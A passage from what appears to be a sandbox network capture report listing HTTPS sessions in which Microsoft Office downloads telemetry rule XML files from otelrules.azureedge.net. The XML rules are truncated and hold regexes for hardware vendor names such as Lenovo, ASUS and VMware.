                                                                                                                                                                            11 | 192.168.2.4 | 49764 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:19 UTC | 192 | OUT | GET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:19 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:19 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                                                                            x-ms-request-id: 8d314a1c-701e-0097-3ae5-21b8c1000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181219Z-r1755647c6688lj6g0wg0rqr1400000005g000000000f233
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:19 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            12 | 192.168.2.4 | 49762 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:19 UTC | 192 | OUT | GET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:19 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:19 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                                                                            x-ms-request-id: 7b93b929-d01e-0082-6676-27e489000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181219Z-17fbfdc98bblzxqcphe71tp4qw00000000p000000000gc0x
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:19 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            13 | 192.168.2.4 | 49766 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:19 UTC | 192 | OUT | GET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:19 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:19 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 467
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                            x-ms-request-id: 895e1389-601e-005c-16b8-20f06f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181219Z-r1755647c66gqcpzhw8q9nhnq0000000064g00000000b3g2
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:19 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
14 | 192.168.2.4 | 49763 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:19 UTC | 192 | OUT | GET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:19 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:19 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                            x-ms-request-id: 08684d9a-201e-0033-16a4-26b167000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181219Z-r1755647c665dwkwce4e7gadz0000000063000000000hytn
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:19 UTC | 415 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session ID | Source IP | Source Port | Destination IP | Destination Port
15 | 192.168.2.4 | 49768 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:20 UTC | 192 | OUT | GET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:20 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:20 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                                                                            x-ms-request-id: 9985b9b7-a01e-0021-5827-28814c000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181220Z-17fbfdc98bbwmxz5amc6q625w000000001gg000000000bye
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:20 UTC | 486 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
16 | 192.168.2.4 | 49767 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:20 UTC | 192 | OUT | GET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:20 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:20 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                            x-ms-request-id: f66eff46-601e-0084-3c9d-276b3f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181220Z-17fbfdc98bb5d4fn785en176rg00000005c000000000ceu3
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:20 UTC | 407 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
17 | 192.168.2.4 | 49769 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:20 UTC | 192 | OUT | GET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:20 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:20 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                                                                            x-ms-request-id: fcb0891e-801e-007b-6669-28e7ab000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181220Z-r1755647c666s72wx0z5rz6s6000000006d000000000bws8
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:20 UTC | 427 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID | Source IP | Source Port | Destination IP | Destination Port
18 | 192.168.2.4 | 49771 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:20 UTC | 192 | OUT | GET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:20 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:20 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                                                                            x-ms-request-id: abb1733e-f01e-005d-6a3c-2813ba000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181220Z-r1755647c66hbclz9tgqkaxg2w00000006y0000000009d8b
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:20 UTC | 407 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
19 | 192.168.2.4 | 49770 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:20 UTC | 192 | OUT | GET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:20 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                                                                            x-ms-request-id: c8022c20-501e-00a3-08ae-26c0f2000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181220Z-r1755647c66z67vn9nc21z11a800000004r000000000eret
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:20 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
20          192.168.2.4  49774        13.107.253.45   443
Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:21 UTC  192                OUT        GET /rules/rule120620v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:21 UTC  491                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:21 GMT
Content-Type: text/xml
Content-Length: 469
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
ETag: "0x8DC582BBA701121"
x-ms-request-id: 898be286-601e-003d-2804-276f25000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181221Z-r1755647c66xdwzbrg67s9avs400000005s000000000g0yk
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:21 UTC  469                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
21          192.168.2.4  49776        13.107.253.45   443
Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:21 UTC  192                OUT        GET /rules/rule120623v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:21 UTC  470                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:21 GMT
Content-Type: text/xml
Content-Length: 464
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
ETag: "0x8DC582B97FB6C3C"
x-ms-request-id: 1a39e609-901e-0048-60a3-26b800000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181221Z-r1755647c66ss75qkr31zpy1kc00000004xg00000000kpkq
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:21 UTC  464                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


Session ID  Source IP    Source Port  Destination IP  Destination Port
22          192.168.2.4  49775        13.107.253.45   443
Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:21 UTC  192                OUT        GET /rules/rule120622v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:21 UTC  470                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:21 GMT
Content-Type: text/xml
Content-Length: 477
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
ETag: "0x8DC582BB8CEAC16"
x-ms-request-id: 9a09e836-e01e-0052-3cae-26d9df000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181221Z-17fbfdc98bbds27mnhu6ftg4d800000003ug000000003d3e
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:21 UTC  477                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
23          192.168.2.4  49777        13.107.253.45   443
Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:21 UTC  192                OUT        GET /rules/rule120624v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:21 UTC  470                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:21 GMT
Content-Type: text/xml
Content-Length: 494
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
ETag: "0x8DC582BB7010D66"
x-ms-request-id: bb58e6ef-e01e-000c-4187-288e36000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181221Z-r1755647c66p58nm9wqx75pnms00000004f000000000hh3z
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:21 UTC  494                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
24          192.168.2.4  49773        13.107.253.45   443
Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:21 UTC  192                OUT        GET /rules/rule120621v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:21 UTC  470                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:21 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
ETag: "0x8DC582BA41997E3"
x-ms-request-id: 6484a1a6-201e-0000-75a3-26a537000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181221Z-r1755647c66ldhdjeavapf4fd000000005eg000000006bax
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:21 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session ID | Source IP | Source Port | Destination IP | Destination Port
25 | 192.168.2.4 | 49780 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:22 UTC | 192 | OUT | GET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:22 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:22 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                            x-ms-request-id: 4f99c795-b01e-0097-3bfd-274f33000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181222Z-17fbfdc98bb8mkvjfkt54wa53800000003cg0000000045xx
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:22 UTC | 404 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


Session ID | Source IP | Source Port | Destination IP | Destination Port
26 | 192.168.2.4 | 49778 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:22 UTC | 192 | OUT | GET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
